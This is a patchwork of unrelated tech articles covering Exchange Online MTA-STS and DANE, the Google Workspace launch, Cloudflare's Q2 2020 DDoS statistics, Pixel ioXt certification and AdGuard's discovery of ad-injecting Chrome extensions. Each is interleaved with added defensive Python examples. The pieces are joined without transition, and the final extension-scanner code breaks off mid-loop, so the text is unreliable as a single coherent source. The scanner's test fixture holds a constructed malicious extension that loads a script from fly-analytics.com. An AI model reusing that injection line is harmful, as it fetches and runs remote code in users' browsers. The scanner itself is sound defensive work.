Microsoft is working on adding SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication security and integrity.
Once MTA-STS is available in Office 365 Exchange Online, email sent by users via Exchange Online to domains that publish an enforce-mode policy will only be delivered over connections that are both authenticated and encrypted, protecting against both interception and tampering in transit.
Protection against MITM and downgrade attacks
MTA-STS strengthens Exchange Online email security by closing several long-standing gaps in SMTP transport: today a sending server will still deliver to a receiver that does not support STARTTLS, presents an expired TLS certificate, or presents a certificate that is not issued by a trusted certificate authority or does not match the server's domain name. MTA-STS lets the receiving domain declare that such failures must abort delivery instead of being silently tolerated.
Given that mail servers will still deliver emails even though a properly secured TLS connection can’t be created, SMTP connections are exposed to various attacks including downgrade and man-in-the-middle attacks.
“[D]owngrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in clear text,” Microsoft says. “Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server.”
“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission,” the company explains in a Microsoft 365 roadmap entry.
“Exchange Online (EXO) outbound mail flow now supports MTA-STS,” Microsoft also adds.
Exchange Online SMTP MTA Strict Transport Security (MTA-STS) support is currently in development, and the company is planning to make it generally available in December 2020 in all environments, for all Exchange Online users.
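The policy logic the roadmap entry describes, as an added worked example that is not Exchange Online's code: it parses the `_mta-sts.<domain>` TXT record and the `https://mta-sts.<domain>/.well-known/mta-sts.txt` policy document defined by RFC 8461, matches the MX host the sender is about to connect to against the policy's `mx` patterns, and applies the policy `mode` to the outcome of the TLS handshake. DNS and HTTPS fetching are left out; `SAMPLE_TXT_RECORD` and `SAMPLE_POLICY` are constructed inputs, and `decide_delivery` and its two boolean TLS-outcome flags are assumptions for illustration, not part of any real MTA's interface.

```python
from dataclasses import dataclass

# Constructed sample inputs (not real DNS data). A sending MTA obtains the first
# from the _mta-sts.<domain> TXT record and the second over HTTPS from
# mta-sts.<domain>/.well-known/mta-sts.txt (RFC 8461, sections 3.1 and 3.2).
SAMPLE_TXT_RECORD = "v=STSv1; id=20201201T000000;"
SAMPLE_POLICY = """version: STSv1
mode: enforce
mx: mail.example.com
mx: *.backup.example.com
max_age: 604800
"""


@dataclass
class StsPolicy:
    version: str
    mode: str       # "enforce", "testing" or "none"
    mx: list        # hostname patterns; a leading "*." matches one label
    max_age: int    # seconds the sender may cache this policy


def parse_sts_txt(txt):
    """Return the policy id from a _mta-sts TXT record, or None if it is not STSv1.
    A changed id tells the sender to refetch the HTTPS policy."""
    fields = {}
    for part in txt.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    if fields.get("v") != "STSv1" or "id" not in fields:
        return None
    return fields["id"]


def parse_policy(text):
    """Parse the key: value policy document. Unknown keys are ignored (RFC 8461 3.2)."""
    version = mode = max_age = None
    mx = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed policy line: %r" % line)
        key, value = key.strip(), value.strip()
        if key == "version":
            version = value
        elif key == "mode":
            mode = value
        elif key == "mx":
            mx.append(value.lower())
        elif key == "max_age":
            max_age = int(value)
    if version != "STSv1" or mode not in ("enforce", "testing", "none"):
        raise ValueError("invalid MTA-STS policy")
    if max_age is None or (mode != "none" and not mx):
        raise ValueError("invalid MTA-STS policy")
    return StsPolicy(version, mode, mx, max_age)


def mx_matches(pattern, hostname):
    """RFC 8461 section 4.1: a leading '*' matches exactly one leftmost label."""
    hostname = hostname.lower().rstrip(".")
    pattern = pattern.lower().rstrip(".")
    if pattern.startswith("*."):
        suffix = pattern[1:]                 # e.g. ".backup.example.com"
        if not hostname.endswith(suffix):
            return False
        leftmost = hostname[:-len(suffix)]
        return bool(leftmost) and "." not in leftmost
    return hostname == pattern


def decide_delivery(policy, mx_host, tls_ok, cert_valid):
    """Apply the policy to one delivery attempt. Returns (deliver, reason).
    tls_ok: STARTTLS was negotiated; cert_valid: the certificate chains to a
    trusted CA and matches mx_host. Both are assumed inputs for the example."""
    if policy.mode == "none":
        return True, "policy mode none: no enforcement"
    if not any(mx_matches(p, mx_host) for p in policy.mx):
        failure = "MX host %s is not listed in the policy" % mx_host
    elif not tls_ok:
        failure = "STARTTLS not negotiated"
    elif not cert_valid:
        failure = "certificate not valid for " + mx_host
    else:
        return True, "delivered over authenticated TLS"
    if policy.mode == "enforce":
        return False, "enforce: " + failure     # this is the downgrade/MITM case
    return True, "testing: delivered despite " + failure + " (report via TLSRPT)"
```

In `enforce` mode a deleted STARTTLS banner or a rerouted MX both end in "not delivered" rather than a cleartext hop, which is the behaviour Microsoft describes; in `testing` mode the sender still delivers but has a failure to report through TLSRPT (RFC 8460), which is how a domain safely stages a policy before enforcing it.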
DNSSEC and DANE for SMTP also coming
Microsoft is also working on including support for the DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities) to Office 365 Exchange Online.
Support for the two SMTP standards will be added to both inbound and outbound mail, “specific to SMTP traffic between SMTP gateways” according to the Microsoft 365 roadmap [1, 2] and this blog post.
According to Microsoft, after including support for the two SMTP security standards in Exchange Online:
DANE for SMTP will provide a more secure method for email transport. DANE uses the presence of DNS TLSA resource records to securely signal TLS support to ensure sending servers can successfully authenticate legitimate receiving email servers. This makes the secure connection resistant to downgrade and MITM attacks.
DNSSEC works by digitally signing records for DNS lookup using public key cryptography. This ensures that the received DNS records have not been tampered with and are authentic.
Microsoft is planning to release DANE and DNSSEC for SMTP in two phases: the first adds outbound support in December 2020, and the second adds inbound support by the end of 2021.
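The TLSA record matching that DANE for SMTP relies on, as an added example that is neither Microsoft's nor Exchange Online's code: it implements the certificate-association comparison of RFC 6698 (selector and matching type) for the DANE-EE usage that RFC 7672 prescribes for SMTP, where the record is published at `_25._tcp.<mx-host>`. `FAKE_CERT_DER` and `FAKE_SPKI_DER` are constructed byte strings standing in for the receiving server's DER certificate and SubjectPublicKeyInfo, not real DER; the DNSSEC validation that must precede any TLSA lookup is assumed to have already succeeded, since an unsigned TLSA answer carries no authentication value.

```python
import hashlib

# Constructed stand-ins (not real DER). In a real sending MTA these come from the
# TLS handshake with the receiving server: the leaf certificate and its SPKI.
FAKE_CERT_DER = b"\x30\x82\x01\x00" + b"constructed-certificate-bytes"
FAKE_SPKI_DER = b"\x30\x5a" + b"constructed-spki-bytes"


def _association_data(selector, cert_der, spki_der):
    """Selector (RFC 6698 2.1.2): 0 = full certificate, 1 = SubjectPublicKeyInfo."""
    if selector == 0:
        return cert_der
    if selector == 1:
        return spki_der
    raise ValueError("unknown selector %d" % selector)


def _matching(matching_type, data):
    """Matching type (RFC 6698 2.1.3): 0 = exact bytes, 1 = SHA-256, 2 = SHA-512."""
    if matching_type == 0:
        return data
    if matching_type == 1:
        return hashlib.sha256(data).digest()
    if matching_type == 2:
        return hashlib.sha512(data).digest()
    raise ValueError("unknown matching type %d" % matching_type)


def tlsa_record(usage, selector, matching_type, cert_der, spki_der):
    """RDATA the receiving domain would publish for its server, e.g. '3 1 1 <sha256>'."""
    data = _matching(matching_type, _association_data(selector, cert_der, spki_der))
    return (usage, selector, matching_type, data)


def parse_presentation(text):
    """Parse the zone-file form '3 1 1 <hex>' into the tuple used above."""
    usage, selector, matching_type, hexdata = text.split()
    return int(usage), int(selector), int(matching_type), bytes.fromhex(hexdata)


def dane_ee_accepts(records, cert_der, spki_der):
    """DANE-EE (usage 3) check for SMTP (RFC 7672 3.1.1): the end-entity certificate
    or key presented by the server must match at least one usable record. For
    usage 3 no PKIX chain validation or name check is required; the DNSSEC-signed
    record itself is the authentication. Usage 2 (DANE-TA) needs chain building and
    is treated as unusable here; usages 0 and 1 are not used for SMTP."""
    for usage, selector, matching_type, data in records:
        if usage != 3:
            continue
        try:
            presented = _matching(matching_type,
                                  _association_data(selector, cert_der, spki_der))
        except ValueError:
            continue   # unknown parameters make the record unusable, not a mismatch
        if presented == data:
            return True
    return False
```

Because matching is on the presented leaf certificate or key rather than on a CA chain, an attacker who reroutes the connection to a server with a different, even CA-issued, certificate fails the check, which is the downgrade and MITM resistance the Microsoft text refers to. Key rotation on the receiving side therefore has to publish the new record before switching certificates.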
For more than a decade, we’ve been building products to help people transform the way they work.
Now, work itself is transforming in unprecedented ways. For many of us, work is no longer a physical place we go to, and interactions that used to take place in person are being rapidly digitized. Office workers no longer have impromptu discussions at the coffee machine or while walking to meetings together, and instead have turned their homes into workspaces. Frontline workers, from builders on a construction site to delivery specialists keeping critical supply chains moving, are turning to their phones to help get their jobs done. Doctors treating patients and local government agencies engaging with their communities are accelerating how they use technology to deliver their services.
Amidst this transformation, time is more fragmented—split between work and personal responsibilities—and human connections are more difficult than ever to establish and maintain.
These are unique challenges, but they also represent a significant opportunity to help people succeed in this highly distributed and increasingly digitized world. With the right solution in place, people are able to collaborate more easily, spend time on what matters most, and foster human connections, no matter where they are.
That solution is Google Workspace: everything you need to get anything done, now in one place. Google Workspace includes all of the productivity apps you know and love—Gmail, Calendar, Drive, Docs, Sheets, Slides, Meet, and many more. Whether you’re returning to the office, working from home, on the frontlines with your mobile device, or connecting with customers, Google Workspace is the best way to create, communicate, and collaborate.
With Google Workspace, we’re introducing three major developments:
a new, deeply integrated user experience that helps teams collaborate more effectively, frontline workers stay connected, and businesses power new digital customer experiences
a new brand identity that reflects our ambitious product vision and the way our products work together
new ways to get started with solutions tailored to the unique needs of our broad range of customers
New user experience
At Next OnAir in July, we announced a better home for work. One that thoughtfully brings together core tools for communication and collaboration—like chat, email, voice and video calling, and content management and collaboration—into a single, unified experience to ensure that employees have access to everything they need in one place. This integrated experience is now generally available to all paying customers of Google Workspace.
In the coming months we’ll also be bringing this new experience to consumers to help them do things like set up a neighborhood group, manage a family budget, or plan a celebration using integrated tools like Gmail, Chat, Meet, Docs, and Tasks.
We’ve already made it easier for business users to connect with customers and partners using guest access features in Chat and Drive, and in the coming weeks, you’ll be able to dynamically create and collaborate on a document with guests in a Chat room. This makes it easy to share content and directly work together with those outside your organization, and ensure that everyone has access and visibility to the same information.
When every minute you spend at work is a minute you could be helping your daughter with her homework, efficiency is everything. We’ve been working hard to add helpful features that make it easier to get your most important work done. For example, in Docs, Sheets, and Slides, you can now preview a linked file without having to open a new tab—which means less time spent moving between apps, and more time getting work done. And beginning today, when you @mention someone in your document, a smart chip will show contact details, including for those outside your organization, provide context and even suggest actions like adding that person to Contacts or reaching out via email, chat or video.
By connecting you to relevant content and people right in Docs, Sheets and Slides, Google Workspace helps you get more done from where you already are.
We also recognize that reinforcing human connections is even more important when people are working remotely and interacting with their customers digitally. It’s what keeps teams together and helps build trust and loyalty with your customers.
Back in July, we shared that we’re bringing Meet picture-in-picture to Gmail and Chat, so you can actually see and hear the people you’re working with, while you’re collaborating. In the coming months, we’ll be rolling out Meet picture-in-picture to Docs, Sheets, and Slides, too. This is especially powerful for customer interactions where you’re pitching a proposal or walking through a document. Where before, you could only see the file you were presenting, now you’ll get all those valuable nonverbal cues that come with actually seeing someone’s face.
And because we know many companies are implementing a mix of remote and in-person work environments, Meet supports a variety of devices with the best of Google AI built in, from helpful and inclusive Series One hardware kits that provide immersive sound and effortless scalability, to native integrations with Chromecast and Nest Smart Displays that make your work experience more enjoyable, whether that’s at home or in the office.
New brand identity
10 years ago, when many of our products were first developed, they were created as individual apps that solved distinct challenges—like a better email with Gmail, or a new way for individuals to collaborate together with Docs. Over time, our products have become more integrated, so much so that the lines between our apps have started to disappear.
Our new Google Workspace brand reflects this more connected, helpful, and flexible experience, and our icons will reflect the same. In the coming weeks, you will see new four-color icons for Gmail, Drive, Calendar, Meet, and our collaborative content creation tools like Docs, Sheets, Slides that are part of the same family. They represent our commitment to building integrated communication and collaboration experiences for everyone, all with helpfulness from Google.
We are also bringing Google Workspace to our education and nonprofit customers in the coming months. Education customers can continue to access our tools via G Suite for Education, which includes Classroom, Assignments, Gmail, Calendar, Drive, Docs, Sheets, Slides, and Meet. G Suite for Nonprofits will continue to be available to eligible organizations through the Google for Nonprofits program.
New ways to get started
Simplicity, helpfulness, flexibility—these guiding principles apply both to the way people experience our products and to the way we do business. All of our customers share a need for transformative solutions—whether to power remote work, support frontline workers, create immersive digital experiences for their own customers, or all of the above—but their storage, management, and security and compliance needs often vary greatly.
In order to provide more choice and help customers get the most out of Google Workspace, we are evolving our editions to provide more tailored offerings. Our new editions for smaller businesses are aimed at those often looking to make fast, self-serviced purchases. Our editions for larger enterprises are designed to help organizations that have more complex implementation needs and often require technical assistance over the course of a longer buying and deployment cycle.
You can learn more about these new offerings on our pricing page. And existing customers can read more here.
Empowering our customers and partners
You, our customers and our users, are our inspiration as we work together to navigate the change ahead. This is an incredibly challenging time, but we believe it’s also the beginning of a new approach to working together. One that is more productive, collaborative, and impactful.
Google Workspace embodies our vision for a future where work is more flexible, time is more precious, and enabling stronger human connections becomes even more important. It’s a vision we’ve been building toward for more than a decade, and one we’re excited to bring to life together with you.
In the first quarter of 2020, within a matter of weeks, our way of life shifted. We’ve become reliant on online services more than ever. Employees that can are working from home, students of all ages and grades are taking classes online, and we’ve redefined what it means to stay connected. The more the public depends on staying connected, the larger the potential reward for attackers to cause chaos and disrupt our way of life. It is therefore no surprise that in Q1 2020 (January 1, 2020 to March 31, 2020) we reported an increase in the number of attacks, especially after government shelter-in-place mandates went into effect in the second half of March.
In Q2 2020 (April 1, 2020 to June 30, 2020), this trend of increasing DDoS attacks continued and even accelerated:
The number of L3/4 DDoS attacks observed over our network doubled compared to that in the first three months of the year.
The scale of the largest L3/4 DDoS attacks increased significantly. In fact, we observed some of the largest attacks ever recorded over our network.
We observed more attack vectors being deployed and attacks were more geographically distributed.
The number of global L3/4 DDoS attacks in Q2 doubled
Gatebot is Cloudflare’s primary DDoS protection system. It automatically detects and mitigates globally distributed DDoS attacks. A global DDoS attack is an attack that we observe in more than one of our edge data centers. These attacks are usually generated by sophisticated attackers employing botnets in the range of tens of thousands to millions of bots.
Sophisticated attackers kept Gatebot busy in Q2. The total number of global L3/4 DDoS attacks that Gatebot detected and mitigated in Q2 doubled quarter over quarter. In our Q1 DDoS report, we reported a spike in the number and size of attacks. We continue to see this trend accelerate through Q2; over 66% of all global DDoS attacks in 2020 occurred in the second quarter (nearly 100% increase). May was the busiest month in the first half of 2020, followed by June and April. Almost a third of all L3/4 DDoS attacks occurred in May.
In fact, 63% of all L3/4 DDoS attacks that peaked over 100 Gbps occurred in May. As the global pandemic continued to heighten around the world in May, attackers were especially eager to take down websites and other Internet properties.
Small attacks continue to dominate in numbers as big attacks get bigger in size
A DDoS attack’s strength is equivalent to its size—the actual number of packets or bits flooding the link to overwhelm the target. A ‘large’ DDoS attack refers to an attack that peaks at a high rate of Internet traffic. The rate can be measured in terms of packets or bits. Attacks with high bit rates attempt to saturate the Internet link, and attacks with high packet rates attempt to overwhelm the routers or other in-line hardware devices.
Similar to Q1, the majority of L3/4 DDoS attacks that we observed in Q2 were also relatively ‘small’ with regards to the scale of Cloudflare’s network. In Q2, nearly 90% of all L3/4 DDoS attacks that we saw peaked below 10 Gbps. Small attacks that peak below 10 Gbps can still easily cause an outage to most of the websites and Internet properties around the world if they are not protected by a cloud-based DDoS mitigation service.
Similarly, from a packet rate perspective, 76% of all L3/4 DDoS attacks in Q2 peaked up to 1 million packets per second (pps). Typically, a 1 Gbps Ethernet interface can deliver anywhere between 80k to 1.5M pps. Assuming the interface also serves legitimate traffic, and that most organizations have much less than a 1 Gbps interface, you can see how even these ‘small’ packet rate DDoS attacks can easily take down Internet properties.
In terms of duration, 83% of all attacks lasted between 30 to 60 minutes. We saw a similar trend in Q1 with 79% of attacks falling in the same duration range. This may seem like a short duration, but imagine this as a 30 to 60 minute cyber battle between your security team and the attackers. Now it doesn’t seem so short. Additionally, if a DDoS attack creates an outage or service degradation, the recovery time to reboot your appliances and relaunch your services can be much longer; costing you lost revenue and reputation for every minute.
In Q2, we saw the largest DDoS attacks on our network, ever
This quarter, we saw an increasing number of large scale attacks; both in terms of packet rate and bit rate. In fact, 88% of all DDoS attacks in 2020 that peaked above 100 Gbps were launched after shelter-in-place went into effect in March. Once again, May was not just the busiest month with the most number of attacks, but also the greatest number of large attacks above 100 Gbps.
From the packet perspective, June took the lead with a whopping 754 million pps attack. Besides that attack, the maximum packet rates stayed mostly consistent throughout the quarter with around 200 million pps.
The 754 million pps attack was automatically detected and mitigated by Cloudflare. The attack was part of an organized four-day campaign that lasted from June 18 to 21. As part of the campaign, attack traffic from over 316,000 IP addresses targeted a single Cloudflare IP address.
Cloudflare’s DDoS protection systems automatically detected and mitigated the attack, and due to the size and global coverage of our network, there was no impact to performance. A globally interconnected network is crucial when mitigating large attacks: it can absorb the attack traffic and mitigate it close to the source while continuing to serve legitimate customer traffic without inducing latency or service interruptions.
The United States is targeted with the most attacks
When we look at the L3/4 DDoS attack distribution by country, our data centers in the United States received the most number of attacks (22.6%), followed by Germany (4.4%), Canada (2.7%) and Great Britain (2.6%).
However, when we look at the total attack bytes mitigated by each Cloudflare data center, the United States still leads (34.9%), but is followed by Hong Kong (6.6%), Russia (6.5%), Germany (4.5%) and Colombia (3.7%). The difference comes from the amount of bandwidth each attack generated. For instance, Hong Kong did not make the top 10 list by number of attacks, since it saw relatively few (1.8%), but the attacks it did see were highly volumetric and generated enough attack traffic to push Hong Kong into second place by bytes.
When analyzing L3/4 DDoS attacks, we bucket the traffic by the Cloudflare edge data center locations and not by the location of the source IP. The reason is when attackers launch L3/4 attacks they can ‘spoof’ (alter) the source IP address in order to obfuscate the attack source. If we were to derive the country based on a spoofed source IP, we would get a spoofed country. Cloudflare is able to overcome the challenges of spoofed IPs by displaying the attack data by the location of Cloudflare’s data center in which the attack was observed. We’re able to achieve geographical accuracy in our report because we have data centers in over 200 cities around the world.
57% of all L3/4 DDoS attacks in Q2 were SYN floods
An attack vector is a term used to describe the attack method. In Q2, we observed an increase in the number of vectors used by attackers in L3/4 DDoS attacks. A total of 39 different types of attack vectors were used in Q2, compared to 34 in Q1. SYN floods formed the majority with over 57% in share, followed by RST (13%), UDP (7%), CLDAP (6%) and SSDP (3%) attacks.
SYN flood attacks aim to exploit the handshake process of a TCP connection. By repeatedly sending initial connection request packets with the synchronize flag (SYN) set, usually from spoofed source addresses, the attacker attempts to overwhelm the connection table of the target, whether that is a server’s TCP stack or a stateful in-line device such as a router or firewall, that tracks the state of half-open TCP connections. The target replies with a synchronize-acknowledge packet (SYN-ACK), allocates a certain amount of memory for each pending connection, and waits in vain for the client to respond with a final acknowledgment (ACK). Given a sufficient number of SYNs occupying the target’s memory, it is unable to allocate entries for legitimate clients, causing a denial of service.
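The classic stateless defence against the failure mode just described, SYN cookies, as an added example that is not Cloudflare's code and not how Gatebot, dosd or flowtrackd are implemented: instead of allocating a half-open entry per SYN, the responder encodes a counter, an MSS index and a keyed hash of the 4-tuple into the initial sequence number of its SYN-ACK, and only creates connection state when a bare ACK arrives whose acknowledgment number decodes to a valid, fresh cookie. `SECRET`, the cookie layout (5-bit counter, 3-bit MSS index, 24-bit MAC) and the `stateful_backlog_exhausted` contrast function are assumptions chosen for illustration; production stacks differ in details such as the MSS table and timestamp handling.

```python
import hashlib
import hmac
import struct

# Constructed secret for the example; a real implementation rotates it.
SECRET = b"constructed-demo-secret"
MSS_TABLE = [536, 1220, 1440, 1460]   # 3 bits allow 8 slots; 4 are used here
COUNTER_PERIOD = 64                   # seconds per counter tick


def _counter(now):
    """5-bit time counter; cookies from more than one tick ago are rejected."""
    return (int(now) // COUNTER_PERIOD) & 0x1F


def _mac(src_ip, dst_ip, src_port, dst_port, counter):
    """Keyed hash over the 4-tuple and counter, truncated to the 24 bits that fit."""
    msg = struct.pack("!4s4sHHB", src_ip, dst_ip, src_port, dst_port, counter)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(client_isn, src_ip, dst_ip, src_port, dst_port, mss, now):
    """Server ISN for the SYN-ACK: counter << 27 | mss_index << 24 | 24-bit MAC.
    Nothing is stored for the half-open connection; the cookie carries it all."""
    t = _counter(now)
    idx = 0
    for i, m in enumerate(MSS_TABLE):   # largest encodable MSS not above the offered one
        if m <= mss:
            idx = i
    h = (_mac(src_ip, dst_ip, src_port, dst_port, t) + client_isn) & 0xFFFFFF
    return (t << 27) | (idx << 24) | h


def validate_ack(ack_num, client_isn, src_ip, dst_ip, src_port, dst_port, now):
    """Called for a bare ACK that matches no existing connection. client_isn is
    the ACK's sequence number minus one. Returns the MSS to use for the new
    connection, or None if the ACK does not carry a valid, fresh cookie."""
    cookie = (ack_num - 1) & 0xFFFFFFFF
    t = (cookie >> 27) & 0x1F
    if (_counter(now) - t) % 32 > 1:
        return None                                # stale: older than two ticks
    expected = (_mac(src_ip, dst_ip, src_port, dst_port, t) + client_isn) & 0xFFFFFF
    if (cookie & 0xFFFFFF) != expected:
        return None                                # forged or replayed to another 4-tuple
    idx = (cookie >> 24) & 0x7
    if idx >= len(MSS_TABLE):
        return None
    return MSS_TABLE[idx]


def stateful_backlog_exhausted(n_spoofed_syns, backlog_size):
    """The failure mode in the text: a stateful responder reserves one half-open
    entry per SYN until timeout, so a spoofed flood fills the table and later
    legitimate SYNs are dropped. Returns True once the backlog is full."""
    half_open = set()
    for i in range(n_spoofed_syns):
        if len(half_open) >= backlog_size:
            return True
        half_open.add(i)
    return False
```

The trade-off is that a cookie-based responder cannot remember TCP options beyond the coarse MSS index, which is why real stacks only switch to cookies once the backlog is under pressure. A device sitting in a unidirectional routing topology, where it sees only one direction of the flow, cannot rely on the ACK numbers alone and has to reconstruct state from what it can observe, which is the harder problem the flowtrackd description later in this post refers to.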
No matter the attack vector, Cloudflare automatically detects and mitigates stateful and stateless DDoS attacks using a three-pronged protection approach comprising our home-built DDoS protection systems:
Gatebot – Cloudflare’s centralized DDoS protection system for detecting and mitigating globally distributed volumetric DDoS attacks. Gatebot runs in our network’s core data center. It receives samples from every one of our edge data centers, analyzes them, and automatically sends mitigation instructions when attacks are detected. Gatebot also monitors the health of each customer’s origin web servers and triggers protection tailored to that customer accordingly.
dosd (denial of service daemon) – Cloudflare’s decentralized DDoS protection systems. dosd runs autonomously in each server in every Cloudflare data center around the world, analyzes traffic, and applies local mitigation rules when needed. Besides being able to detect and mitigate attacks at super fast speeds, dosd significantly improves our network resilience by delegating the detection and mitigation capabilities to the edge.
flowtrackd (flow tracking daemon) – Cloudflare’s TCP state tracking machine for detecting and mitigating the most randomized and sophisticated TCP-based DDoS attacks in unidirectional routing topologies. flowtrackd is able to identify the state of a TCP connection and then drops, challenges or rate-limits packets that don’t belong to a legitimate connection.
In addition to our automated DDoS protection systems, Cloudflare also generates real-time threat intelligence that automatically mitigates attacks. Furthermore, Cloudflare provides its customers firewall, rate-limiting and additional tools to further customize and optimize their protection.
Cloudflare DDoS mitigation
As Internet usage continues to evolve for businesses and individuals, expect DDoS tactics to adapt as well. Cloudflare protects websites, applications, and entire networks from DDoS attacks of any size, kind, or level of sophistication.
Our customers and industry analysts recommend our comprehensive solution for three main reasons:
Network scale: Cloudflare’s 37 Tbps network can easily block attacks of any size, type, or level of sophistication. The Cloudflare network has a DDoS mitigation capacity that is higher than the next four competitors—combined.
Time-to-mitigation: Cloudflare mitigates most network layer attacks in under 10 seconds globally, and immediate mitigation (0 seconds) when static rules are preconfigured. With our global presence, Cloudflare mitigates attacks close to the source with minimal latency. In some cases, traffic is even faster than over the public Internet.
Threat intelligence: Cloudflare’s DDoS mitigation is powered by threat intelligence harnessed from over 27 million Internet properties on it. Additionally, the threat intelligence is incorporated into customer facing firewalls and tools in order to empower our customers.
Cloudflare is uniquely positioned to deliver DDoS mitigation with unparalleled scale, speed, and smarts because of the architecture of our network. Cloudflare’s network is like a fractal—every service runs on every server in every Cloudflare data center that spans over 200 cities globally. This enables Cloudflare to detect and mitigate attacks close to the source of origin, no matter the size, source, or type of attack.
You can also join an upcoming live webinar where we will be discussing these trends, and strategies enterprises can implement to combat DDoS attacks and keep their networks online and fast.
Trust is very important when it comes to the relationship between a user and their smartphone. While phone functionality and design can enhance the user experience, security is fundamental and foundational to our relationship with our phones. There are multiple ways to build trust around the security capabilities that a device provides, and we continue to invest in verifiable ways to do just that.
The Internet of Secure Things Alliance (ioXt) manages a security compliance assessment program for connected devices. ioXt has over 200 members across various industries, including Google, Amazon, Facebook, T-Mobile, Comcast, Zigbee Alliance, Z-Wave Alliance, Legrand, Resideo, Schneider Electric, and many others. With so many companies involved, ioXt covers a wide range of device types, including smart lighting, smart speakers, webcams, and Android smartphones.
The core focus of ioXt is “to set security standards that bring security, upgradability and transparency to the market and directly into the hands of consumers.” This is accomplished by assessing devices against a baseline set of requirements and relying on publicly available evidence. The goal of ioXt’s approach is to enable users, enterprises, regulators, and other stakeholders to understand the security in connected products to drive better awareness towards how these products are protecting the security and privacy of users.
ioXt’s baseline security requirements are tailored for product classes, and the ioXt Android Profile enables smartphone manufacturers to differentiate security capabilities, including biometric authentication strength, security update frequency, length of security support lifetime commitment, vulnerability disclosure program quality, and preloaded app risk minimization.
We believe that using a widely known industry consortium standard for Pixel certification provides increased trust in the security claims we make to our users. NCC Group has published an audit report that can be downloaded here. The report documents the evaluation of Pixel 4/4 XL and Pixel 4a against the ioXt Android Profile.
Security by Default is one of the most important criteria used in the ioXt Android profile. Security by Default rates devices by cumulatively scoring the risk for all preloads on a particular device. For this particular measurement, we worked with a team of university experts from the University of Cambridge, University of Strathclyde, and Johannes Kepler University in Linz to create a formula that considers the risk of platform signed apps, pregranted permissions on preloaded apps, and apps communicating using cleartext traffic.
In partnership with those teams, Google created Uraniborg, an open source tool that collects necessary attributes from the device and runs it through this formula to come up with a raw score. NCC Group leveraged Uraniborg to conduct the assessment for the ioXt Security by Default category.
As part of our ongoing certification efforts, we look forward to submitting future Pixel smartphones through the ioXt standard, and we encourage the Android device ecosystem to participate in similar transparency efforts for their devices.
Acknowledgements: This post leveraged contributions from Sudhi Herle, Billy Lau and Sam Schumacher
More than 80 million Chrome users have installed one of 295 Chrome extensions that hijack and insert ads inside Google and Bing search results.
The malicious extensions were discovered by AdGuard, a company that provides ad-blocking solutions, while the company’s staff was looking into a series of fake ad-blocking extensions that were available on the official Chrome Web Store.
A subsequent investigation into the fake ad blockers unearthed a larger group of malicious activity spreading across 295 extensions.
Besides fake ad blockers, AdGuard said it also found extensions posing as weather forecast widgets and screenshot capture utilities.
However, the vast majority of the malicious extensions (245 out of the 295 extensions) were simplistic utilities that had no other function than to apply a custom background for Chrome’s “new tab” page.
In a technical analysis shared with ZDNet, AdGuard said all extensions loaded malicious code from the fly-analytics.com domain, and then proceeded to quietly inject ads inside Google and Bing search results.
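A local check for the indicator AdGuard reported, as an added example that is neither AdGuard's nor ZDNet's tooling: it walks a Chrome profile's unpacked extension directory, reads each extension's name from `manifest.json`, and flags any extension whose JavaScript, HTML or manifest files reference `fly-analytics.com`. The profile paths in `default_extension_roots` are the usual Chrome locations and are assumptions; `build_sample_profile` and `demo` create a constructed two-extension tree (fake IDs, not real extensions) so the scan can run offline, and a plain string match like this will miss obfuscated or concatenated domain strings.

```python
import json
import os
import tempfile

# Indicator from AdGuard's analysis: the extensions loaded their payload from here.
DEFAULT_INDICATORS = ("fly-analytics.com",)


def default_extension_roots():
    """Usual Chrome extension directories (assumed paths for the default profile)."""
    home = os.path.expanduser("~")
    return [
        os.path.join(home, ".config", "google-chrome", "Default", "Extensions"),
        os.path.join(home, "Library", "Application Support", "Google", "Chrome",
                     "Default", "Extensions"),
        os.path.join(home, "AppData", "Local", "Google", "Chrome", "User Data",
                     "Default", "Extensions"),
    ]


def scan_extensions(root, indicators=DEFAULT_INDICATORS):
    """Walk <root>/<extension id>/<version>/ and return
    {extension_id: {"name": ..., "hits": [(relative file, indicator), ...]}}
    for every extension whose .js/.json/.html files contain an indicator."""
    findings = {}
    if not os.path.isdir(root):
        return findings
    for ext_id in sorted(os.listdir(root)):
        ext_dir = os.path.join(root, ext_id)
        if not os.path.isdir(ext_dir):
            continue
        name, hits = None, []
        for dirpath, _, files in os.walk(ext_dir):
            for fn in files:
                path = os.path.join(dirpath, fn)
                if fn == "manifest.json" and name is None:
                    try:
                        with open(path, encoding="utf-8") as f:
                            name = json.load(f).get("name")
                    except (OSError, ValueError):
                        pass
                if not fn.endswith((".js", ".json", ".html")):
                    continue
                try:
                    with open(path, "rb") as f:
                        data = f.read()
                except OSError:
                    continue
                for indicator in indicators:
                    if indicator.encode() in data:
                        hits.append((os.path.relpath(path, ext_dir), indicator))
        if hits:
            findings[ext_id] = {"name": name, "hits": hits}
    return findings


def build_sample_profile(root):
    """Constructed extension tree for a self-contained run: one benign new-tab
    background extension and one that injects a remote script (fake IDs)."""
    samples = {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": (
            "Plain New Tab Background", 'document.body.style.background = "#224";'),
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": (
            "Weather Widget",
            'var s = document.createElement("script");'
            's.src = "https://fly-analytics.com/a.js";'
            'document.head.appendChild(s);'),
    }
    for ext_id, (name, js) in samples.items():
        d = os.path.join(root, ext_id, "1.0.0_0")
        os.makedirs(d)
        with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as f:
            json.dump({"name": name, "manifest_version": 2, "version": "1.0.0",
                       "background": {"scripts": ["bg.js"]}}, f)
        with open(os.path.join(d, "bg.js"), "w", encoding="utf-8") as f:
            f.write(js)


def demo():
    """Scan the constructed profile and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_profile(tmp)
        return scan_extensions(tmp)


if __name__ == "__main__":
    for root in default_extension_roots():
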